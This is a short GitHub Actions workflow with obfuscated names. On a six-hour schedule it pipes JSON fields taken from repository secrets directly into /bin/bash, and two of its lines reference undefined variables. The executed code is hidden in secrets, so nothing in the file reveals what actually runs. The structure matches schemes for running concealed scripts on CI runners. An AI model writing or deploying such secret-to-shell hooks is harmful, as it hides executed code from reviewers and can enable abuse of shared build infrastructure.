name: joemoonx

on:
  workflow_dispatch:
  schedule:
    - cron: '31 5/6 * * *'

jobs:
  build:
    runs-on: ubuntu-latest

    steps:
      - uses: actions/checkout@v4
      - name: joemoonx
        env:
          dwzn17714: ${{ secrets.dwzn17714 }}
        run: |
          echo $dwzn17714 | jq -r .cs2323 | /bin/bash
          echo $md53685 | jq -r .mtlqq6797 | /bin/bash
          echo $xg9887 | jq -r .wxv348 | /bin/bash

